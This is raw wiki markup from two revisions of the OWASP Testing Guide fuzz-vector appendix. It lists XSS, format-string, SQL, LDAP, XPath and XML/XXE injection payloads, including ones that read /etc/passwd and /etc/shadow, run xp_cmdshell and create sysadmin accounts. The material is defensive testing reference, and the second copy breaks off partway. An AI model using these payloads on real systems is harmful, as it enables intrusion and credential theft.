&lt;nowiki&gt;'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;javascript:alert('XSS');&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=javascript:alert('XSS')&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt; &lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;quot;XSS&lt;WBR&gt;&amp;amp;quot;)&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMGSRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;&lt;WBR&gt;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;&lt;WBR&gt;#116;&amp;amp;#58;&amp;amp;#97;<br /> &amp;amp;#108;&amp;amp;#101;&amp;amp;&lt;WBR&gt;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83&lt;WBR&gt;;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMGSRC=&amp;#0000106&amp;#0000097&amp;&lt;WBR&gt;#0000118&amp;#0000097&amp;#0000115&amp;&lt;WBR&gt;#0000099&amp;#0000114&amp;#0000105&amp;&lt;WBR&gt;#0000112&amp;#0000116&amp;#0000058<br /> &amp;&lt;WBR&gt;#0000097&amp;#0000108&amp;#0000101&amp;&lt;WBR&gt;#0000114&amp;#0000116&amp;#0000040&amp;&lt;WBR&gt;#0000039&amp;#0000088&amp;#0000083&amp;&lt;WBR&gt;#0000083&amp;#0000039&amp;#0000041&gt;&lt;/nowiki&gt;&lt;br&gt; <br /> &lt;nowiki&gt;&lt;IMGSRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;&lt;WBR&gt;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;&lt;WBR&gt;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28<br /> &amp;&lt;WBR&gt;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x09;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0A;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0D;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;<br /> <br /> === Buffer Overflows and Format String Errors ===<br /> <br /> ==== Buffer Overflows (BFO) ====<br /> A buffer overflow or memory corruption attack is a programming condition which allows overflowing of valid data beyond its prelocated storage limit in memory.<br /> <br /> For details on Buffer Overflows: [[Buffer_Overflow_Testing_AoC]]<br /> <br /> Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.<br /> <br /> &lt;nowiki&gt;A x 5&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 17&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 33&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 65&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 129&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 257&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 513&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 1024&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 2049&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 4097&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 8193&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 12288&lt;/nowiki&gt;<br /> <br /> ==== Format String Errors (FSE) ====<br /> <br /> Format string attacks are a class of vulnerabilities which involve supplying language specific format tokens in order to execute arbitrary code or crash a program. Fuzzing for such errors has as an objective to check for unfiltered user input.<br /> <br /> Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.<br /> <br /> &lt;nowiki&gt;%s%p%x%d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;.1024d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%.2049d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%p%p%p%p&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%x%x%x%x&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%d%d%d%d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%s%s%s%s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%99999999999s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%08x&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20n&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20x&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%s%s%s%s%s%s%s%s%s%s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%p%p%p%p%p%p%p%p%p%p&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%s x 129&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%x x 257&lt;/nowiki&gt;<br /> <br /> ==== Integer Overflows (INT) ====<br /> <br /> Integer overflow errors occur when a program fails to account for the fact that an arithmetic operation can result in a quantity either greater than a data type's maximum value or less than its minimum value. If an attacker can cause the program to perform such a memory allocation, the program can be potentially vulnerabie to a buffer overflow attack.<br /> <br /> &lt;nowiki&gt;-1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x100&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x1000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x3fffffff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x7ffffffe&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x7fffffff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x80000000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0xfffffffe&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0xffffffff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x10000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x100000&lt;/nowiki&gt;<br /> <br /> === SQL Injection ===<br /> <br /> This attack can affect the database layer of an application and is typically present when user input is not filtered for SQL statements.<br /> <br /> For details on Testing SQL Injection: [[Testing_for_SQL_Injection]]<br /> <br /> SQL Injection is classified in the following two categories, depending on the exposure of database information (passive) or the alteration of database information (active).<br /> <br /> * Passive SQL Injection<br /> * Active SQL Injection<br /> <br /> Active SQL Injection statements can have a detrimental effect on the underllying database if successfully executed.<br /> <br /> ==== Passive SQL Injection (SQP) ====<br /> <br /> &lt;nowiki&gt;'||(elt(-3+5,bin(15),ord(10),hex(char(45))))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;||6&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'||'6&lt;/nowiki&gt;<br /> &lt;nowiki&gt;(||6)&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 1=1--&lt;/nowiki&gt; <br /> &lt;nowiki&gt;OR 1=1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR '1'='1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;; OR '1'='1'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+--+&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot; or 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1=1 /*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;or 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 'a'='a&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot; or &quot;a&quot;=&quot;a&lt;/nowiki&gt;<br /> &lt;nowiki&gt;') or ('a'='a&lt;/nowiki&gt;<br /> &lt;nowiki&gt;Admin' OR '&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' group by userid having 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1 in (select @@version)--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union all select @@version--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'unusual' = 'unusual'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'something' = 'some'+'thing'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'text' = N'text'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'something' like 'some%'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 2 &gt; 1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'text' &gt; 't'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'whatever' in ('whatever')&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 2 BETWEEN 1 and 3&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or username like char(37);&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union select * from users where login = char(114,111,111,116);&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union select &lt;/nowiki&gt;<br /> &lt;nowiki&gt;Password:*/=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;UNI/**/ON SEL/**/ECT&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'/**/OR/**/1/**/=/**/1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1/*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+--+&amp;password=&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &gt; <br /> @var select @var as var into temp end --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1 in (select var from temp)--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union select 1,load_file('/etc/passwd'),1,1,1;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' and 1=( if((load_file(char(110,46,101,120,116))&lt;&gt;char(39,39)),1,0));&lt;/nowiki&gt;<br /> <br /> ==== Active SQL Injection (SQI) ====<br /> <br /> &lt;nowiki&gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY 'pass123'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &lt;/nowiki&gt;<br /> &lt;nowiki&gt;' ; drop table temp --&lt;/nowiki&gt;<br /> &lt;nowiki&gt;exec sp_addlogin 'name' , 'password'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) <br /> + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&lt;/nowiki&gt;<br /> <br /> === LDAP Injection ===<br /> <br /> For details on LDAP Injection: [[LDAP_Injection_Testing_AoC]]<br /> <br /> &lt;nowiki&gt;|&lt;/nowiki&gt;<br /> &lt;nowiki&gt;!&lt;/nowiki&gt;<br /> &lt;nowiki&gt;(&lt;/nowiki&gt;<br /> &lt;nowiki&gt;)&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%28&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%29&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&amp;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%26&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%21&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%7C&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*|&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%2A%7C&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*(|(mail=*))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%2A%28%7C%28mail%3D%2A%29%29&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*(|(objectclass=*))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%2A%28%7C%28objectclass%3D%2A%29%29&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*()|%26'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;admin*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;admin*)((|userPassword=*)&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*)(uid=*))(|(uid=*&lt;/nowiki&gt;<br /> <br /> === XPATH Injection ===<br /> <br /> For details on XPATH Injection: [[XPath_Injection_Testing_AoC]]<br /> <br /> &lt;nowiki&gt;'+or+'1'='1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'+or+''='&lt;/nowiki&gt;<br /> &lt;nowiki&gt;x'+or+1=1+or+'x'='y&lt;/nowiki&gt;<br /> &lt;nowiki&gt;/&lt;/nowiki&gt;<br /> &lt;nowiki&gt;//&lt;/nowiki&gt;<br /> &lt;nowiki&gt;//*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*/*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;@*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;count(/child::node())&lt;/nowiki&gt;<br /> &lt;nowiki&gt;x'+or+name()='username'+or+'x'='y&lt;/nowiki&gt;<br /> <br /> === XML Injection ===<br /> <br /> Details on XML Injection here: [[XML_Injection_Testing_AoC]]<br /> <br /> &lt;nowiki&gt;&lt;![CDATA[&lt;script&gt;var n=0;while(true){n++;}&lt;/script&gt;]]&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;foo&gt;&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('gotcha');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;foo&gt;&lt;![CDATA[' or 1=1 or ''=']]&gt;&lt;/foof&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file://c:/boot.ini&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file:///etc/shadow&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file:///dev/random&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> <br /> <br /> <br /> {{Category:OWASP Testing Project AoC}}</div> Subere https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&diff=14337 OWASP Testing Guide Appendix C: Fuzz Vectors 2006-12-13T23:51:52Z <p>Subere: /* Integer Overflows (INT) */</p> <hr /> <div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br&gt;<br /> {{Template:OWASP Testing Guide v2}}<br /> <br /> <br /> The following are fuzzing vectors which can be used with [[WebScarab]], [[JBroFuzz]], [[WSFuzzer]], or another fuzzer.<br /> Fuzzing is the &quot;kitchen sink&quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.<br /> This is the simple part of the discovery phase.<br /> Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.<br /> <br /> === Fuzz Categories ===<br /> <br /> In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:<br /> <br /> * Recursive fuzzing<br /> * Replacive fuzzing<br /> <br /> We examine and define each category in the sub-sections that follow. <br /> <br /> ==== Recursive fuzzing ====<br /> <br /> Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Selecting &quot;8302fa3b&quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:<br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/00000000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/11000fff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/ffffffff&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> ==== Replacive fuzzing ====<br /> <br /> Replacive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: <br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> This is a form of replacive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. <br /> <br /> The remainder of this appendix presents a number of fuzz vector categories.<br /> <br /> === Cross Site Scripting (XSS) ===<br /> <br /> For details on XSS: [[Cross_site_scripting_AoC]]<br /> <br /> &lt;nowiki&gt;&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;STYLE&gt;@import&quot;javascript:alert('XSS')&quot;;&lt;/STYLE&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&gt;&quot;'&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;<br /> alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&gt;&quot;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;javascript:alert('XSS');&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=javascript:alert('XSS')&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt; &lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;quot;XSS&lt;WBR&gt;&amp;amp;quot;)&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMGSRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;&lt;WBR&gt;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;&lt;WBR&gt;#116;&amp;amp;#58;&amp;amp;#97;<br /> &amp;amp;#108;&amp;amp;#101;&amp;amp;&lt;WBR&gt;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83&lt;WBR&gt;;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMGSRC=&amp;#0000106&amp;#0000097&amp;&lt;WBR&gt;#0000118&amp;#0000097&amp;#0000115&amp;&lt;WBR&gt;#0000099&amp;#0000114&amp;#0000105&amp;&lt;WBR&gt;#0000112&amp;#0000116&amp;#0000058<br /> &amp;&lt;WBR&gt;#0000097&amp;#0000108&amp;#0000101&amp;&lt;WBR&gt;#0000114&amp;#0000116&amp;#0000040&amp;&lt;WBR&gt;#0000039&amp;#0000088&amp;#0000083&amp;&lt;WBR&gt;#0000083&amp;#0000039&amp;#0000041&gt;&lt;/nowiki&gt;&lt;br&gt; <br /> &lt;nowiki&gt;&lt;IMGSRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;&lt;WBR&gt;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;&lt;WBR&gt;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28<br /> &amp;&lt;WBR&gt;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x09;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0A;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0D;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;<br /> <br /> === Buffer Overflows and Format String Errors ===<br /> <br /> ==== Buffer Overflows (BFO) ====<br /> A buffer overflow or memory corruption attack is a programming condition which allows overflowing of valid data beyond its prelocated storage limit in memory.<br /> <br /> For details on Buffer Overflows: [[Buffer_Overflow_Testing_AoC]]<br /> <br /> Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.<br /> <br /> &lt;nowiki&gt;A x 5&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 17&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 33&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 65&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 129&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 257&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 513&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 1024&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 2049&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 4097&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 8193&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 12288&lt;/nowiki&gt;<br /> <br /> ==== Format String Errors (FSE) ====<br /> <br /> Format string attacks are a class of vulnerabilities which involve supplying language specific format tokens in order to execute arbitrary code or crash a program. Fuzzing for such errors has as an objective to check for unfiltered user input.<br /> <br /> Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.<br /> <br /> &lt;nowiki&gt;%s%p%x%d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;.1024d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%.2049d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%p%p%p%p&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%x%x%x%x&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%d%d%d%d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%s%s%s%s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%99999999999s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%08x&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20n&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20x&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%s%s%s%s%s%s%s%s%s%s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%p%p%p%p%p%p%p%p%p%p&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%s x 129&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%x x 257&lt;/nowiki&gt;<br /> <br /> ==== Integer Overflows (INT) ====<br /> <br /> Integer overflow errors occur when a program fails to account for the fact that an arithmetic operation can result in a quantity either greater than a data type's maximum value or less than its minimum value. If an attacker can cause the program to perform such a memory allocation, the program can be potentially vulnerabie to a buffer overflow attack.<br /> <br /> &lt;nowiki&gt;-1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x100&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x1000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x3fffffff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x7ffffffe&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x7fffffff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x80000000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0xfffffffe&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0xffffffff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x10000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x100000&lt;/nowiki&gt;<br /> <br /> === SQL Injection ===<br /> <br /> For details on Testing SQL Injection: [[Testing_for_SQL_Injection]]<br /> <br /> ==== Passive SQL Injection (SQP) ====<br /> <br /> &lt;nowiki&gt;'||(elt(-3+5,bin(15),ord(10),hex(char(45))))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;||6&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'||'6&lt;/nowiki&gt;<br /> 